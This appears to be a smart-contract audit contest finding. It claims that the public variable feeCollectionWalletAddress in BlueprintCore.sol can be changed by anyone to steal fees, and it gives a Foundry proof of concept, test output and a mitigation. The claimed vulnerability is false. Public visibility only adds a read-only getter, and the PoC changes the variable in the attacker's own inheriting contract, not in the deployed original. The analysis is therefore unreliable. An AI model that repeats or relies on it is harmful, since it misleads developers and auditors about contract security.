Tall Green Corgi

High

# public visibility of variable ``feeCollectionWalletAddress`` In the contract ``BlueprintCore.sol`` causing anyone to change it and receive the fee

### Summary

In the contract ``BlueprintCore.sol`` the visibility of variable ``feeCollectionWalletAddress`` which can cause anyone to change the address and receive the fee

### Root Cause

the root cause of this problem is the public visibility of variable ``feeCollectionWalletAddress`` In the contract ``BlueprintCore.sol``
link "https://github.com/sherlock-audit/2025-03-crestal-network/blob/27a3c28155702b3a68f29347efedffb048010e33/crestal-omni-contracts/src/BlueprintCore.sol#L91" 

### Internal Pre-conditions

none

### External Pre-conditions

none

### Attack Path

attacker just need to inherit and call the contract ``BlueprintCore.sol``

### Impact

anyone can change the ``feeCollectionWalletAddress`` In the contract ``BlueprintCore.sol`` and claim the fee 

### PoC

here is the PoC
written using foundry
the attacker create the following contract
``` solidity
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.26;
import {BlueprintCore} from "./BlueprintCore.sol";
import {console} from "forge-std/console.sol";
contract canChangeAddress is BlueprintCore {

    function changeFeeCollectionWalletAddress() public returns(address){
        address oldaddress = feeCollectionWalletAddress;
        address _feeCollectionWalletAddress = 0x5B38Da6a701c568545dCfcB03FcB875f56beddC4;
        feeCollectionWalletAddress = _feeCollectionWalletAddress;
        return oldaddress;
       
    }
    function getFeeCollectionWalletAddress() public view returns(address){
        return feeCollectionWalletAddress;   
  
    }

}
```
``` solidity
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.26;
import {Test, console} from "forge-std/Test.sol";
import {canChangeAddress} from "../src/canChangeAddress.sol";
import {BlueprintCore} from "../src/BlueprintCore.sol";

contract changingAddress is Test{
    BlueprintCore bulePrint;
    canChangeAddress canChangcontract;
    address attacker = makeAddr("attacker");
    function setUp() public{
        bulePrint = new BlueprintCore();
        canChangcontract = new canChangeAddress();
    }
    
    function testchangeFeeCollectionWalletAddress() public{
        vm.startPrank(attacker);
        address oldAddr = canChangcontract.changeFeeCollectionWalletAddress();
        console.log("old address");
        console.logAddress(oldAddr);
        console.log("new address");
        console.logAddress(canChangcontract.getFeeCollectionWalletAddress());
        vm.stopPrank();
    }
}
```
```console output
result
Ran 1 test for test/changingAddress.t.sol:changingAddress
[PASS] testchangeFeeCollectionWalletAddress() (gas: 40357)
Logs:
old address
 0x0000000000000000000000000000000000000000 
 new address
 0x5B38Da6a701c568545dCfcB03FcB875f56beddC4
```


### Mitigation

In the contract ``BlueprintCore.sol`` the visibility variable `feeCollectionWalletAddress` can be changed from public to private and a function can be created with modifier `onlyOwner` which can change the value of  `feeCollectionWalletAddress`